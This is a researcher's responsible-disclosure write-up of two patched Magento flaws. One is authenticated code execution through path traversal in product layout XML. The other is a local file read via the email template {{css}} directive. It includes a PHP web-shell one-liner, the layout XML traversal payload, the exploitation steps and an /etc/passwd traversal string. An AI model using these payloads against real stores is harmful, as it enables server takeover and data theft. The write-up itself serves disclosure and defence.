I regularly search for vulnerabilities on big services that allow it and have a Bug Bounty program. Here is a second paper which covers two vulnerabilities I discovered on Magento, a big ecommerce CMS that’s now part of Adobe Experience Cloud. These vulnerabilities have been responsibly disclosed to Magento team, and patched for Magento 2.3.0, 2.2.7 and 2.1.16.
Both of vulnerabilities need low privileges admin account, usually given to Marketing users :
The first vulnerability is a command execution using path traversal, and requires the user to be able to create products
The second vulnerability is a local file read, and requires the user to be able to create email templates
Here are the details !
### Command Execution in Product Creation
Magento has its own way to define the layout of a product, into the Design tab of the Product creation system. It’s format is XML-based and follows a syntax documented by Magento themselves. The full documentation is here : https://devdocs.magento.com/guides/v2.3/frontend-dev-guide/layouts/xml-instructions.html
The interesting thing is the possibility to instantiate blocks with the <block> tag, and then to call methods on it with the <action> tag. This will only work if the object implements the Block interface, by the way. However, I was searching if there’s anything interesting to do with this, and saw the following function for class Magento\Framework\View\Element\Template :
* Retrieve block view from file (template)
* @param string $fileName
* @return string
public function fetchView($fileName)
$relativeFilePath = $this->getRootDirectory()->getRelativePath($fileName);
'TEMPLATE:' . $fileName,
['group' => 'TEMPLATE', 'file_name' => $relativeFilePath]
if ($this->validator->isValid($fileName)) {
$extension = pathinfo($fileName, PATHINFO_EXTENSION);
$templateEngine = $this->templateEnginePool->get($extension);
$html = $templateEngine->render($this->templateContext, $fileName, $this->_viewVars);
} else {
$html = '';
$templatePath = $fileName ?: $this->getTemplate();
$errorMessage = "Invalid template file: '{$templatePath}' in module: '{$this->getModuleName()}'"
. " block's name: '{$this->getNameInLayout()}'";
if ($this->_appState->getMode() === \Magento\Framework\App\State::MODE_DEVELOPER) {
throw new \Magento\Framework\Exception\ValidatorException(
new \Magento\Framework\Phrase(
\Magento\Framework\Profiler::stop('TEMPLATE:' . $fileName);
return $html;
This code is responsible for loading templates from file; there’s two extension authorized that are phtml (to treat it as PHP template file) and xhtml (to treat it as plain HTML file I imagine?). Obviously, we want the PHP thing, that’s more fun.
The $fileName parameter is passed into the \Magento\Framework\View\Element\Template\File\Validator::isValid() function, that checks if the file is in certain directories (compiled, module or themes directories). This check used the isPathInDirectories to do so :
protected function isPathInDirectories($path, $directories)
if (!is_array($directories)) {
$directories = (array)$directories;
foreach ($directories as $directory) {
if (0 === strpos($path, $directory)) {
return true;
return false;
This function only checks if the provided path begins by a specific directory name (ex: /path/to/your/magento/app/code/Magento/Theme/view/frontend/). However, it does not control that’s the resolved path is still in those whitelisted directories. That means there’s an obvious path traversal in this function that we can call through a Product Design. However, it will only process .phtml file as PHP code, which is a forbidden extension on most upload forms.
“Most of upload forms” means there’s exception! You can create a file with “Custom Options”, and one is “File”. I imagine this is in case the customer wants to send a 3D template or instructions for its order. The real reason isn’t that important, the fact is that you can allow extensions you want to be uploaded, including phtml. Once the item is ordered, the uploaded file will be stored in /your/path/to/magento/pub/media/custom_options/quote/firstLetterOfYourOriginalFileName/secondLetterOfYourOriginalFileName/md5(contentOfYourFile).extension
This is sufficient for having a command execution payload. Here is the complete steps :
Log in with a user that has some low admin privileges and is allowed to create products
First of all, create a new product, with a new Custom Options of type File, with .phtml as an authorized extension and some pieces in stock to order one.
Go on the frontend, on the product you just created. Upload your .phtml and set the item in your cart. For example, my file is named “blaklis.phtml” and contains “<?php eval(stripslashes($_REQUEST[0])); ?>“
The .phtml file is uploaded to /your/path/to/magento/pub/media/custom_options/quote/firstLetterOfYourOriginalFileName/secondLetterOfYourOriginalFileName/md5(contentOfYourPhtmlFile).phtml. For example, for my file, the location will be /your/path/to/magento/pub/media/custom_options/quote/b/l/11e48860e4cdacada256445285d56015.phtml
You must have the full path to the application to use the fetchView function. An easy way to retrieve it is to run the following request :
POST /magentoroot/index.php/magentoadmin/product_video/product_gallery/retrieveImage/key/[key]/?isAjax=true HTTP/1.1
Connection: close
This will make CURL crash and display an error with full path in it
In the design tab of the product, add a 2 column layouts with the following XML in Layout Update XML :
<referenceContainer name="sidebar.additional">
<block class="Magento\Backend\Block\Template" name="test">
<action method="fetchView">
<argument name="fileName" xsi:type="string">/path/to/your/magento/app/code/Magento/Theme/view/frontend/../../../../../../pub/media/custom_options/quote/b/l/11e48860e4cdacada256445285d56015.phtml</argument>
Go to the frontend page of this product; your code should executed.
This flaw was not that obvious, but has been fun to search for!
### Local File Read in Email Templating
This one is a lot easier; in fact, it was a pretty obvious one. Email templating allow to use some special directives, surrounded by {{ }}. One of these directives is {{css 'path'}} to load the content of a CSS file into the email. The path parameter is vulnerable to path traversal, and can be used to inject any file into the email template.
The functions that are managing this directive are the following :
public function cssDirective($construction)
if ($this->isPlainTemplateMode()) {
return '';
$params = $this->getParameters($construction[2]);
$file = isset($params['file']) ? $params['file'] : null;
if (!$file) {
// Return CSS comment for debugging purposes
return '/* ' . __('"file" parameter must be specified') . ' */';
$css = $this->getCssProcessor()->process(
if (strpos($css, ContentProcessorInterface::ERROR_MESSAGE_PREFIX) !== false) {
// Return compilation error wrapped in CSS comment
return '/*' . PHP_EOL . $css . PHP_EOL . '*/';
} elseif (!empty($css)) {
return $css;
} else {
// Return CSS comment for debugging purposes
return '/* ' . sprintf(__('Contents of %s could not be loaded or is empty'), $file) . ' */';
public function getCssFilesContent(array $files)
// Remove duplicate files
$files = array_unique($files);
$designParams = $this->getDesignParams();
if (!count($designParams)) {
throw new \Magento\Framework\Exception\MailException(
__('Design params must be set before calling this method')
$css = '';
try {
foreach ($files as $file) {
$asset = $this->_assetRepo->createAsset($file, $designParams);
$pubDirectory = $this->getPubDirectory($asset->getContext()->getBaseDirType());
if ($pubDirectory->isExist($asset->getPath())) {
$css .= $pubDirectory->readFile($asset->getPath());
} else {
$css .= $asset->getContent();
} catch (ContentProcessorException $exception) {
$css = $exception->getMessage();
} catch (\Magento\Framework\View\Asset\File\NotFoundException $exception) {
$css = '';
return $css;
Those 2 functions are not checking for path traversal characters anywhere, and are indeed vulnerable.
Creating an email template with the {{css file="../../../../../../../../../../../../../../../etc/passwd"}} should be sufficient to trigger the vulnerability.
Here is the responsible disclosure timeline for these 2 bugs : firstly, for the RCE one, and then for the file read one
* 2018.09.11 : initial disclosure for the path traversal / RCE
* 2018.09.17 : triaged by Bugcrowd staff
* 2018.10.08 : triaged by Magento staff
* 2018.11.28 : patch issued by Magento; release 2.2.7 and 2.1.16 released
* 2018.12.11 : a $5000 bounty was awarded
* 2018.08.09 : initial disclosure for the path traversal / local file read
* 2018.08.29 : triaged by Bugcrowd staff after asking for details
* 2018.10.08 : triaged by Magento staff
* 2018.11.28 : patch issued by Magento; release 2.2.7 and 2.1.16 released
* 2019.01.04 : a $2500 bounty was awarded